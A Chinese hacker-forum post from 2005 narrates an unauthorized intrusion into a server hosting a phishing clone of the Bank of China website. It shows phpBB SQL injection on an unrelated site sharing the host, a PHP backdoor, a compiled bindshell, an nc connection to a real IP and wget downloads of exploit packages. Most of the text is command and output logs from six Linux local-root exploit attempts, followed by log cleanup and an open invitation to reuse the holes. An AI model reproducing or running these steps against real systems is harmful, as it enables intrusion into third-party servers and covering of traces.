[分享]入侵中国虚假银行的实录

touch_itpub

来原黑盟：\n本来不打算把这个不成功的入侵写出来的，后来有几个朋友想看，既然能在内部交流，也没有什么见不得人的，索性发出来，初学者可以借鉴一点经验，高手可以在此基础上作更多尝试，我也想多学点东西。\n  27日晚看到天天网的一片报道：中国银行网站再次遭遇克隆 假网站远在北美，\n本站转载路径：http://www.coolersky.com/web/news/20050228014041.asp\n  本来要整理规划的，既然出了这个事情，好歹看看吧。废话不说，开始！\n  1、收集信息\n\n  服务器信息：\nApache/1.3.33   \nPHP/4.3.9\n  网站主文件：\n_blank>http://www.banochi.net/english/index.shtml\n\n\n  查看虚假网站，基本没发现什么可用的东西，估计只有记录密码和ip的cgi程序。除了服务器入侵，还可以考虑旁注。\n  检索其他站点，分析了几个php站点的注入，没太多利用的地方。想起phpbb的洞洞，写段代码检索一下viewtopic.php文件，找到一个phpbb2.0.10入侵点\n\n_blank>http://www.bits-clsu.org/forum/viewtopic.php?t=1\n\n\n  事后才想起可以用旁注工具直接来检索，反正都一样。\n  2、上传木马\n  利用phpbb的洞，漏洞介绍“phpBB远程任意SQL注入漏洞”，“phpbb<2.0.11程序的sql注入漏洞分析”上传php后门。\n  3、生成bindshell\n  我还在看文件的时候，Edward就已经做了个bindshell出来，呵呵！基本方法：\n  上传bindshell.c\n\n  gcc -o /tmp/bind bindshell.c\n  /tmp/bind \n\n\n  nc上去看看，还是在shell下比较方便。\n\n  nc -vv 216.22.48.72 7758\n\n\n  4、采集系统信息\n  拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等，检索到虚假网站的绝对路径/home/banochin/public_html/，在webshell中查看文件创建的时期是服务器时间2004-12-15，在其cgi-bin目录下有如下文件\n\n文件     创建日期         最后修改         大小     属性   \n[member]   2005-02-21 21:39:03 2005-02-21 21:39:03 <dir> 0700 \nerrlog.dat 2005-02-28 00:32:22 2005-02-28 00:32:22 140.186 KB 0600 \nid.dat   2005-02-24 10:48:35 2005-02-24 10:48:35 1.727 KB 0600 \nindex.htm 2004-12-15 03:19:51 2004-12-15 03:19:51 0.697 KB 0644\npwd.dat   2005-02-25 00:36:15 2005-02-25 00:36:15 0.170 KB 0600 \npwdbak.dat 2004-12-15 03:24:17 2004-12-15 03:19:55 0.516 KB 0600 \nsecurity.cgi 2004-12-15 03:24:03 2004-12-15 03:20:00 44.363 KB 0700 \nvisemailer.cgi 2004-12-15 03:24:04 2004-12-15 03:20:02 3.554 KB 0700 \n\n\n  可以看到最后记录的密码日期是2月25日，而浏览目录后发现还包括了很多其他语言的中国银行网站内容，但基本都是html文件，想必是从中国银行直接webdump下来的。\n  内核信息，因为我们对其目录没有写权限，接着要做的就是提权了。前后大概用了1小时左右，而剩下的提权工作却花了我1天多的时间，结果还是没搞定，郁闷！\n\n  uname -r\n  2.4.20-021stab022.11.777-enterprise\n\n\n  5、本地提升权限测试\n  增加环境变量\n  export PATH=/usr/binPATH\n  否则会出现collect2: cannot find `ld/错误！\n（1）Linux Kernel moxa串行驱动BSS溢出漏洞\n  grsecurity 2.1.0 release / 5 Linux kernel advisories\nURL：\n  _bug&do=view&bug_id=7446&keyword=\" target=_blank>http://www.nsfocus.net/index.php ... d=7446&keyword=\n  _blank>http://lists.netsys.com/pipermai ... January/030660.html\n文件：\n  _and_patches.tgz\" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz\n测试：\n\n  wget _and_patches.tgz\" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz\n  tar -zxvf exploits_and_patches.tgz\n  cd exploits_and_patches\n  make alloc=0x100000\n------------------------------------------------------------------------\nnasm -f elf -DALLOCATE=32482374 mlock-dos.S\nmake: nasm: Command not found\nmake: *** [ all ] Error 127\n------------------------------------------------------------------------\n\n\n结论：\n  缺少nasm，即使上传rpm也不能够执行安装！\n（2）Linux Kernel uselib()特权提升漏洞\n  Linux kernel sys_uselib local root vulnerability\nURL：\n  _bug&do=view&bug_id=7326&keyword=\" target=_blank>http://www.nsfocus.net/index.php ... d=7326&keyword=\n  _blank>http://marc.theaimsgroup.com/?l= ... 415105841&q=raw\n  _blank>http://marc.theaimsgroup.com/?l= ... 12575901427&w=2\n  _blank>http://isec.pl/vulnerabilities/isec-0021-uselib.txt\n文件：\n  _blank>http://marc.theaimsgroup.com/?l= ... 2575901427&q=p3\n测试：\n\n  gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108\n------------------------------------------------------------------------\nelflbl_v108.c: In function `check_vma_flags/:\nelflbl_v108.c:545: warning: deprecated use of label at end of compound statement\n------------------------------------------------------------------------\n  ./elflbl_v108\n------------------------------------------------------------------------\n  child 1 VMAs 0\n[+] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000\n[+] vmalloc area 0xc7c00000 - 0xcf707000\n  Wait... -Segmentation fault\n-------------------------------------------------------------------------\n  gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109\n  ./elflbl_v109\n------------------------------------------------------------------------\n[+] SLAB cleanup\n[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)\nsh: line 9: 24080 Killed             ./elflbl_v109\n------------------------------------------------------------------------\n\n\n（3）Linux内核本地整数溢出和内存泄露漏洞\n  fun with linux kernel\nURL：\n  _bug&do=view&bug_id=7269&keyword=\" target=_blank>http://www.nsfocus.net/index.php ... d=7269&keyword=\n  _blank>http://marc.theaimsgroup.com/?l= ... 74209001676&w=2\n测试：\n\n  gcc -o vc vc_resize.c\n  ./vc_resize\n------------------------------------------------------------------------\nopen: No such device or address\n------------------------------------------------------------------------\n  gcc memory_leak.c -o memory_leak\n------------------------------------------------------------------------\nmemory_leak.c:80:2: warning: no newline at end of file\n------------------------------------------------------------------------\n\n\n（4）Linux Kernel do_mremap VMA本地权限提升漏洞\n  Linux kernel do_mremap VMA limit local privilege escalation\nURL：\n  _bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD\" target=_blank>http://www.nsfocus.net/index.php ... eyword=%CC%E1%C9%FD\n  _blank>http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\n文件：\n  _pte.c\" target=_blank>http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c\n测试：\n\n  gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte\n  ./mremap_pte\n------------------------------------------------------------------------\n[+] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES\n  MMAP #65530 0x50bfa000 - 0x50bfb000\n[-] Failed\n------------------------------------------------------------------------\n\n\n（5）Linux Kernel kmod/ptrace竞争条件权限提升漏洞\n  linux kmod/ptrace bug - details\nURL：\n  _bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD\" target=_blank>http://www.nsfocus.net/index.php ... eyword=%CC%E1%C9%FD\n  _blank>http://marc.theaimsgroup.com/?l= ... 11209231385&w=2\n文件：\n  _blank>http://august.v-lo.krakow.pl/~anszom/km3.c\n测试：\n\n  gcc -o km3 km3.c\n  ./km3 ?\n------------------------------------------------------------------------\nUsage: ./km3 [-d] [-b] [-r] [-s] [-c executable]\n    -d     -- use double-ptrace method (to run interactive programs)\n    -b     -- start bindshell on port 4112\n    -r     -- support randomized pids\n    -c     -- choose executable to start\n    -s     -- single-shot mode - abort if unsuccessful at the first try\n------------------------------------------------------------------------\n  ./km3 -s\n------------------------------------------------------------------------\nLinux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>\n\n=> Simple mode, executing /usr/bin/id > /dev/tty\nsizeof(shellcode)=95\n=> Child process started..........\nFailed\n------------------------------------------------------------------------\n\n\n（6）Linux Kernel i386 SMP页错误处理器特权提升漏洞\n  Linux kernel i386 SMP page fault handler privilege escalation\nURL：\n  _bug&do=view&bug_id=7338\" target=_blank>http://www.nsfocus.net/index.php ... iew&bug_id=7338\n  _blank>http://marc.theaimsgroup.com/?l= ... 54694522719&w=2\n测试：\n\n  gcc -o smp smp.c\n  ./smp\n------------------------------------------------------------------------\n[+] in thread 1 (pid = 5400)\n[+] in thread 2 (pid = 5401)\n[+] rdtsc calibration: 53428\n[+] exploiting race, wait...\n[-] unable to exploit race in 30s,\nkernel patched or load too high.\n------------------------------------------------------------------------\n\n\n  尝试多个本地提权均未能成功！很郁闷！而在测试过程的时候，虚假网站已经被关闭了，虽然文件还在，但是很明显官方已经作了努力，并得到了不错的结果。\n  6、其他\n  找了几个linux的键盘记录，都要root权限。而服务器远程连接使用的ssh的，使用sniffer也估计没戏，所以暂时也没什么思路，清理exp、日志文件。\n  以上是我的一些测试的结果，结果也没有拿到root，不过我整理了一下相关的漏洞，希望对大家以后有些帮助。在站长群里发布了相关的结果，也没有人回话，不知道大家是太忙。。。\n  文中并未特殊处理漏洞及结果，有兴趣的可以直接利用，不过没必要为难其他站点，我想大家明白我的意思！\n  折腾了这么久，还有好多工作的事情要做！希望不会被老板说，呵呵！\n  最后感谢Edward、老黑及几位公司的高人